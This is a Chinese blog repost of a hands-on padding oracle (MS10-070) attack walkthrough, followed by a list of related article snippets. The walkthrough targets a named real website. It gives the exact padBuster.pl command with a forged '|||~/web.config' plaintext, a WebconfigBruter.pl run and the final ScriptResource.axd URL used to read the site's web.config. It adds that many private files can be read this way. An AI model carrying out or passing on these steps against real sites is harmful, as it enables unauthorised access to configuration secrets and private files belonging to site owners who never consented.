【原创】实战padding oracle漏洞

最新推荐文章于 2024-08-13 08:18:48 发布
最新推荐文章于 2024-08-13 08:18:48 发布
阅读量598 收藏 3
点赞数
文章标签: 数据库 javascript ViewUI
原文链接:http://www.cnblogs.com/wh4am1/p/6683393.html
版权

首先关于padding oracle漏洞的原理请看:

 

步入正传~~

搭建漏洞利用环境Perl

环境下载地址:链接:http://pan.baidu.com/s/1skFxVm1 密码:anuw

首先查看我们目标网站

http://www.hnmatc.org/admin/

然后我们查看页面的源代码

 

我们翻到如下链接

<script src="/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2&t=635844789308448806" type="text/javascript"></script>


<script src="/WebResource.axd?d=EmAjXDcDoy8nFp_k_mvjI05whiqnlUaw-CI-p9EFNRQ1&t=635844789308448806" type="text/javascript"></script>

  我们选中复制  构建链接

http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2

然后我们拿出我们的神器padBuster.pl

输入代码

padbuster.pl http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2 cWxcb2PXfUgWzoITVCYtLg2 16 -encoding 3 -plaintext "|||~/web.config"

  稍微等待几分钟。。。

在这里The ID# marked with ** is recommended :我们输入2

跑完之后可以看到密匙  然后再祭出我们的另外一个神器WebconfigBruter.pl

C:\>WebconfigBruter.pl http://www.hnmatc.org/ScriptResource.axd BEKLiGJw9rbsDY8IOiMmTAAAAAAAAAAAAAAAAAAAAAA1 16

  然后继续跑

最后得到源密匙

最终得到密匙为:uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

然后访问地址:http://www.hnmatc.org/ScriptResource.axd?d=uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

最后   此漏洞不仅仅是可以读取到config文件  大量隐私文件都可以读取

 

转载于:https://www.cnblogs.com/wh4am1/p/6683393.html

web渗透--35--Padding Oracle攻击
武天旭的博客
09-21 2975
1、漏洞描述: Padding Oracle攻击指应用在解密客户端提交的加密数据时,泄露了解密数据的分段填充是否合法的信息。攻击者利用Padding Oracle可以在不知道加密程序所使用的密钥的情况下,解密数据或者加密任意数据。即使应用程序确认加密数据的完整性,仍会导致该程序仍有敏感数据泄露和越权漏洞的风险。 密文在被解密时,会被分成若干个数据块,每个数据块有固定的长度,常见的加密算法大多为8字...
Java Web 开发极简入门实战教程
最新发布
AI天才研究院
10-31 489
在进入Java Web开发的具体技术细节之前,首先让我带你了解Java Web的发展历程、Java在Web开发中的优势以及常见的Java Web技术栈。这一章节将为你奠定坚实的基础,帮助你更好地理解后续章节中的内容。在实际项目开发中,通常会使用构建工具来管理项目依赖、编译代码、运行测试和打包部署。本节将介绍 Maven 和 Gradle 这两款常用的 Java 构建工具。Gradle 是一个基于 Groovy 语言的构建工具,它使用 Groovy 脚本来描述项目的配置信息。
shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理
热门推荐
Shanfenglan's blog
11-14 1万+
文章目录利用条件shiro550shiro721环境搭建漏洞复现 利用条件 shiro550 知道key且目标服务器含有可利用的攻击链 影响版本:1.2.4以下 shiro721 知道已经登陆用户的合法cookie,利用padding orcale 加密生成恶意rememberme的值进行利用 影响版本: 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1 环境搭建 git clone https://github.com/inspiri
ASP.NET Padding Oracle信息泄露漏洞
hityct1的专栏
02-24 1247
http://blog.sina.com.cn/s/blog_53aab5c10102v5et.html
Padding Oracle小试成功
weixin_34248258的博客
09-06 170
去年ASP.NET爆出了MS10-070漏洞,也就是俗称的Padding Oracle,一直想找个网站试下,利用google搜索关键字WebResource.axd,找有此漏洞的网站,一直没有成功,今天换了关键字,成功利用此漏洞!利用的是GDSSECURITY的一款工具,虽然漏洞是利用成功了,对造成此漏洞的详细原因也了解,但对这款漏洞利用工具为什么这么用却是一头雾水,也曾经...
记录"我对Padding Oracle攻击的分析和思考"之抄写
zhangge3663的博客
03-22 653
一、相关阅读资料          https://github.com/GDSSecurity/PadBuster  PadBuster – Automated script for performing Padding Oracle attacks http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6  道哥的分析
Apache Shiro系列漏洞利用以及实战总结
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
pybleach:实战PKCS1_v1.5填充预言机攻击解析
【标签】中提到的 "python oracle padding-oracle-attacks pkcs Python" 表明该库是用Python语言编写的,专门用于执行填充预言机攻击,并且与PKCS#1 v1.5标准相关。而【压缩包子文件的文件名称列表】中的 "pybleach-...
Web中间件常见安全漏洞
KHOST的博客
03-19 9627
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
小技巧:Mac下Metasploit渗透Oracle环境的搭建
weixin_30270889的博客
01-23 142
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Oracle是第一个跨整个产品线(数据库、业务应用软件和应用软件开发与决策支持工具)开发和部署10...
利用方法ms10-070(ASP.NET Padding Oracle Vulnerability)1
08-08
利用方法ms10-070(ASP.NET Padding Oracle Vulnerability)1
ms10-070利用padBuster.pl
11-11
利用ms10-070 ASP.NET Padding Oracle信息泄露漏洞,可以读到web.config等重要文件。
Shiro_721_Padding_Oracle_RCE:Shiro_721 exp 纯手工实现Padding Oracle整个过程
04-24
Shiro-721 Padding Oracle RCE Exp 免责声明:本工具仅供安全测试学习用途,禁止非法使用 纯手工实现Padding Oracle过程, 没有利用python-paddingoracle的api,可用于学习padding oracle细节。 默认采用jrmp gadget, 可以在脚本中自行更换,但是不建议,除非目标环境需要,因为padding oracle的耗时依赖于待加密payload的长度,jrmp长度相对较短。 测试环境:官方demo就可以了。 参考链接: Usage: python3 shiro_oracle_padding.py <target> <regular>
PadBuster-master.zip
09-06
PadBuster-master.zip 需要perl环境,报错的话需安装 libwww-perl-5.837.tar.gz ,我资源里有
padding oracle
cc1988429的专栏
12-20 553
http://pnig0s1992.blog.51cto.com/393390/538399 收藏一下
浅析padding oracle
weixin_34095889的博客
07-19 303
Padding Oracle Attack,被誉为2010十大WEB***之首,但从字面上看,大家很容易误解,其实和Oracle数据库一点关系都没有,这里的Oracle是提示的意思,硬翻译过来,就是填充提示***,产生这个问题的原因,推荐大家去看《Automated Padding Oracle Attacks with PadBuster》这篇文章,有人翻译了下,但翻译的不...
PadBuster 使用教程
gitblog_00853的博客
08-13 382
PadBuster 使用教程 项目地址:https://gitcode.com/gh_mirrors/pa/PadBuster 1. 项目的目录结构及介绍 PadBuster 是一个用于自动化 Padding Oracle 攻击的 Perl 脚本。以下是项目的目录结构及其介绍: PadBuster/ ├── LICENSE ├── README ├── padBuster.pl LICENSE...
ms10-070详细利用方法
H4ck3x的专栏
06-16 5106
作者:hrayha之前搞一个目标站的时候用WVS扫描,出现”asp.net padding oracle ”这么一条高危漏洞,由于之前没听说过,便到网上查了一下资料。这技术其实是去年被发现的,还有一个称呼是ms10-070,不过目前国内研究的人好像还不多,查到的资料几乎都是国外的,其实这技术的危害性还是很巨大的,就拿针对asp.net来说,可以读出web.config等一些敏感文件的内容,具体
ms10070利用方法 - cracer_优快云
m0_67888657的博客
07-11 171
看到这一步,我想这是什么文件大家就都应该明白了,按照网上的说法,padding oracle跟注入的存在一样普遍,本人在此没有讲太多关于原理的东西实在是因为没有特别深入的了解,讲多了反而怕误导大家,所以希望大家去我前面引用到的文章自己看一下原理,按照我最粗俗的理解,asp.net padding oracle其实就是一个解密字符串,同时爆破到密钥,然后在加密我们想得到的文件,以便进行一次正确格式的提交来读取到我们想看到的文件内容。经过大半天的爆破,我们发现了大小13k的log文件,访问后结果如图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值